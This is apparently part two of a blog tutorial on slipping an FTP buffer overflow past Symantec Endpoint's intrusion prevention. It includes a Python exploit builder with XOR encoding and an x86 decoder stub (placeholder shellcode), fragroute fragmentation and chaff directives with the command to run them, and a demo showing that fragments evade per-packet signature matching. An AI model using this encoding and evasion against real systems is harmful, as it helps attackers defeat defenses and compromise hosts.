This article is the second part of the "Ask and you shall receive" series. Almost a month ago I received a comment from tborland1, and he/she was kind enough to explain to me that the first article had nothing to do with bypassing IPS/IDS devices, which by the way is true. But it did explain rapid payload delivery, and it did mention that the fragroute tool (and some other tools) can be used to bypass this type of device, so in this article I will show more specifically how to bypass the Symantec Endpoint IPS/IDS software. But the most important thing is that I did explain from scratch the underlying technologies and the basic concept, which by the way is that a buffer overflow is a simple string, just like an SQL injection string, and that you can manipulate that string to do WHATEVER YOU WANT with it.
But before I start talking about buffer overflow obfuscation I will first talk about the different stages a buffer overflow goes through before reaching the target machine. So let's talk first about the buffer overflow structure and the TCP/IP stages (I am reminding you that the buffer overflow is the one mentioned in Part 1).
Before the buffer overflow string reaches the target machine it first has to go through the TCP/IP stack, then the operating system, and only then reach the vulnerable application. In our case the buffer overflow string is the one from the first part. Before we start testing the attack pattern we will check that the vulnerable application is still working, and then move on. So what we want to do with our scenario is shown below:
Note: Notice that the shell is a reverse shell, that the host IPS is inspecting the TCP/IP traffic, and that the FTP application is the one handling our buffer. The host-based IPS is the Symantec software, version 12.
The Buffer Overflow structure
As already mentioned, a traditional buffer overflow (one not based on ROP) looks like this (the buffer overflow structure shown below is based on the Free Float Ftp v1 buffer overflow explained in the previous article):
- About the red sections:
- About the orange sections:
- About the Aqua section:
- About the Green section:
The TCP/IP Stack structure
During the experiment we will manipulate the stack to deceive the host-based IPS; more specifically we will focus on only two layers, the TCP layer and the IP layer. The following schema shows the layers we will play with:
Note: Using fragroute we will alter some TCP and IP fields to bypass the Symantec Endpoint software.
The Tools for obfuscating the Buffer Overflow String
The tools I am going to use to manipulate the buffer structure are either part of the Metasploit suite or are applied manually. More specifically I am going to use:
- Manual Encoding
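To make the "buffer overflow is just a string" idea concrete for both the structure above and the manual encoding step, here is an added example (written for this page; it is not the Part 1 exploit nor Metasploit code). It assembles the traditional layout of padding, overwritten return address, NOP sled and payload, then hand-encodes the payload with a single-byte XOR so that none of the bytes that break an FTP command line (NUL, CR, LF) appear in the string, and prepends a small x86 decoder stub written for this example. The offset, the JMP ESP address and the "shellcode" bytes are constructed placeholders, not values for Free Float Ftp.

```python
import struct

# Assumptions for this example: the real offset and return address come
# from debugging the target (as in Part 1); these are hypothetical values.
OFFSET_TO_EIP = 230            # bytes of padding before the saved EIP
JMP_ESP_ADDR = 0x7C9D30D7      # hypothetical address of a JMP ESP instruction
NOP_SLED_LEN = 16

# FTP commands are text lines: NUL ends a C string and CR/LF end the
# command, so none of these bytes may appear anywhere in the string.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed stand-in for real shellcode (not a working payload); it
# deliberately contains all three bad characters so the encoder has work.
RAW_SHELLCODE = bytes.fromhex("31c0506863616c635459000a0d89e151ffd0")


def contains_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> bool:
    """True if any forbidden byte occurs in data."""
    return any(b in bad for b in data)


def find_xor_key(shellcode: bytes, bad: bytes = BAD_CHARS):
    """Return a single-byte XOR key such that neither the key nor any
    encoded byte is a bad character, or None if no such key exists."""
    for key in range(1, 256):
        if key not in bad and all((b ^ key) not in bad for b in shellcode):
            return key
    return None


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with key; XOR is its own inverse, so this also decodes."""
    return bytes(b ^ key for b in data)


def decoder_stub(key: int, length: int) -> bytes:
    """32-bit x86 jmp/call/pop decoder written for this example.  It XORs
    the `length` bytes that follow it with `key`, then falls through into
    them.  It assumes the payload sits in writable memory (the stack after
    JMP ESP) and is shorter than 256 bytes, because the count lives in CL.

        00: EB 0E          jmp short 0x10 (get_addr)
        02: 90             nop   (pads the jump so its offset is not 0x0D)
        03: 5E   decode:   pop esi            ; esi -> first encoded byte
        04: 31 C9          xor ecx, ecx
        06: B1 <len>       mov cl, len
        08: 80 36 <key>    xor byte [esi], key
        0B: 46             inc esi
        0C: E2 FA          loop 0x08
        0E: EB 05          jmp short 0x15 (payload)
        10: E8 EE FF FF FF get_addr: call 0x03 ; pushes address of payload
        15:                encoded payload
    """
    if not 0 < length < 256:
        raise ValueError("payload length must fit in CL")
    return (b"\xeb\x0e\x90\x5e\x31\xc9\xb1" + bytes([length])
            + b"\x80\x36" + bytes([key])
            + b"\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff")


def build_exploit(shellcode: bytes, offset: int = OFFSET_TO_EIP,
                  ret_addr: int = JMP_ESP_ADDR, nop_len: int = NOP_SLED_LEN,
                  bad: bytes = BAD_CHARS) -> bytes:
    """Assemble padding + return address + NOP sled + decoder + encoded
    shellcode, refusing to emit a string that contains a bad character."""
    # The length byte inside the stub must not be a bad character either,
    # so pad the shellcode with NOPs until its length is acceptable.
    while len(shellcode) in bad:
        shellcode += b"\x90"
    key = find_xor_key(shellcode, bad)
    if key is None:
        raise ValueError("no single-byte XOR key avoids the bad characters")
    encoded = xor_encode(shellcode, key)
    payload = decoder_stub(key, len(encoded)) + encoded
    eip = struct.pack("<I", ret_addr)       # little-endian overwrite of EIP
    exploit = b"A" * offset + eip + b"\x90" * nop_len + payload
    if contains_bad_chars(exploit, bad):    # also catches a bad byte in the address
        raise ValueError("exploit string still contains a bad character")
    return exploit


if __name__ == "__main__":
    buf = build_exploit(RAW_SHELLCODE)
    print(len(buf), "bytes; XOR key", find_xor_key(RAW_SHELLCODE))
```

The point of the key search is that a signature written for the plain shellcode bytes no longer matches the wire string, while the string still respects the protocol's constraints; a multi-byte or rolling key, or a Metasploit encoder, changes the bytes further in the same way.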
The Tools for obfuscating the Buffer Overflow at the TCP/IP stack
Fragroute helps the pentester intercept, modify and rewrite egress traffic according to the rules defined in its configuration file. By editing the configuration file (installed as '/etc/fragroute.conf' on many systems) so that it contains directives such as the following, you can attempt to bypass the targeted IPS/IDS:
ip_frag 64
tcp_chaff paws
The first directive splits every outbound IP packet into fragments carrying 64 bytes of payload each (the size must be a multiple of 8). The second interleaves the real TCP segments with chaff segments that carry stale TCP timestamp options: the target host discards them under PAWS (RFC 1323), but an inspection device that does not apply the same check may accept them and therefore see a different stream than the host does.
Fragroute inserts a route to the server you target so that all your traffic to it passes through fragroute; there is no need to configure a proxy in web browsers (if you are targeting a web server).
This configuration goes in the conf file /pentest/scanners/fragroute-1.2/fragroute.conf, and the command would be:
bt ~ # fragroute -f /pentest/scanners/fragroute-1.2/fragroute.conf xxx.xxx.xxx.xxx
Note: After the command is executed, just browse to the site and your traffic will be fragged! Another technique that can be used in conjunction with fragroute, for evasion purposes, is gzip encoding.
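To show concretely what the ip_frag rule does to the overflow string on the wire, here is an added example (written for this page; it is neither fragroute's code nor Symantec's inspection logic). It wraps a constructed FTP command in an IPv4 datagram, splits it into 64-byte fragments the way `ip_frag 64` does, and runs two inspectors over the result: one that matches a signature against each packet on its own, and one that reassembles the datagram first, as the target's IP stack does. The TCP header is omitted for brevity, the tcp_chaff rule is not modelled, and whether a given IPS reassembles before matching is something you have to test against that product.

```python
import struct

IP_MF = 0x2000                  # "more fragments" bit in the flags/offset field
OFFSET_MASK = 0x1FFF            # fragment offset, in 8-byte units
IP_PROTO_TCP = 6
IP_HDR = "!BBHHHBBH4s4s"        # version/IHL, TOS, total length, ID,
                                # flags+offset, TTL, proto, checksum, src, dst


def ip_checksum(header: bytes) -> int:
    """Standard one's-complement checksum over the IPv4 header."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_packet(src: bytes, dst: bytes, payload: bytes, ident: int,
                frag_off: int = 0, more: bool = False, ttl: int = 64,
                proto: int = IP_PROTO_TCP) -> bytes:
    """Build one IPv4 packet (20-byte header, no options).
    frag_off is the payload offset in bytes and must be a multiple of 8."""
    flags_off = (IP_MF if more else 0) | (frag_off // 8)
    hdr = struct.pack(IP_HDR, 0x45, 0, 20 + len(payload), ident, flags_off,
                      ttl, proto, 0, src, dst)
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def ip_fragment(packet: bytes, size: int) -> list:
    """Split an IPv4 packet into fragments carrying `size` payload bytes
    each, which is what fragroute's `ip_frag <size>` rule does (so size
    must be a multiple of 8).  Every fragment keeps the original IP ID;
    all but the last carry the MF flag."""
    if size <= 0 or size % 8:
        raise ValueError("fragment size must be a positive multiple of 8")
    ihl = (packet[0] & 0x0F) * 4
    (_, _, _, ident, _, ttl, proto, _, src, dst) = struct.unpack(IP_HDR, packet[:20])
    payload = packet[ihl:]
    frags = []
    for off in range(0, len(payload), size):
        chunk = payload[off:off + size]
        more = off + size < len(payload)
        frags.append(ipv4_packet(src, dst, chunk, ident, off, more, ttl, proto))
    return frags


def ip_reassemble(frags: list) -> bytes:
    """Rebuild the original payload from the fragments of one datagram, in
    any order, the way the target's IP stack does before TCP sees the data."""
    pieces = {}
    for frag in frags:
        ihl = (frag[0] & 0x0F) * 4
        flags_off = struct.unpack("!H", frag[6:8])[0]
        pieces[(flags_off & OFFSET_MASK) * 8] = frag[ihl:]
    return b"".join(pieces[off] for off in sorted(pieces))


def per_packet_match(frags: list, signature: bytes) -> bool:
    """A naive inspector that looks for the signature in each packet alone."""
    return any(signature in frag[(frag[0] & 0x0F) * 4:] for frag in frags)


def reassembled_match(frags: list, signature: bytes) -> bool:
    """An inspector that reassembles the datagram first, like the end host."""
    return signature in ip_reassemble(frags)


# Constructed sample: an FTP USER command with an oversized argument,
# standing in for the overflow string of Part 1 (not the real exploit).
SRC, DST = bytes([10, 0, 0, 5]), bytes([10, 0, 0, 9])
OVERFLOW_CMD = b"USER " + b"A" * 300 + b"\r\n"
SIGNATURE = b"USER " + b"A" * 100        # a "long USER argument" signature


def demo(size: int = 64) -> dict:
    """Fragment the command as `ip_frag 64` would and compare both inspectors."""
    original = ipv4_packet(SRC, DST, OVERFLOW_CMD, ident=0x1234)
    frags = ip_fragment(original, size)
    return {
        "fragments": len(frags),
        "seen_per_packet": per_packet_match(frags, SIGNATURE),
        "seen_after_reassembly": reassembled_match(frags, SIGNATURE),
    }


if __name__ == "__main__":
    print(demo())
```

The 105-byte signature cannot fit inside any single 64-byte fragment, so the per-packet inspector never fires, while the reassembling inspector and the target host both see the complete command. This is the whole bet behind ip_frag: it only pays off against an inspector that does not reassemble (or whose reassembly timeouts and limits differ from the host's).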
About the Symantec Antivirus software
The following text is an extract from a post by Mr Vikram Kumar hosted on Symantec's official web site:
"Symantec Endpoint Protection IPS system is the best IPS available anywhere! I explained Symantec maintains one of the world's most comprehensive vulnerability databases, currently consisting of more than 32,000 recorded vulnerabilities (spanning more than two decades) affecting more than 72,000 technologies from more than 11,000 vendors. You can also create your own IPS rules for your specific requirement."
Note: So you get the picture that if I bypass Symantec's HIPS I will have defeated the world's best HIPS.
About the Symantec intrusion prevention sub system
The following text extract was taken from the Symantec administration guide:
"The intrusion prevention system (IPS) is the Symantec Endpoint Protection client's second layer of defense after the firewall. The IPS is a network-based system that operates on every computer on which the client is installed and the intrusion prevention system is enabled. If a known attack is detected, one or more intrusion prevention technologies can automatically block it.
The intrusion prevention system scans each packet that enters and exits computers in the network for attack signatures. Attack signatures are the packet sequences that identify an attacker’s attempt to exploit a known operating system or program vulnerability.
If the information matches a known attack, the IPS automatically discards the packet. The IPS can also sever the connection with the computer that sent the data for a specified amount of time. This feature is called active response, and it protects computers on your network from being affected in any way. The client includes the following types of IPS engines that identify attack signatures."
What I will do in this article is focus on two different things:
- The TCP/IP Obfuscation (for handling the antivirus/antispyware)
- The Buffer Overflow Obfuscation (for handling the HIPS)
This post is getting bigger and bigger, so I will break it into a third part. I hope you enjoy it when it is finished.
To be continued...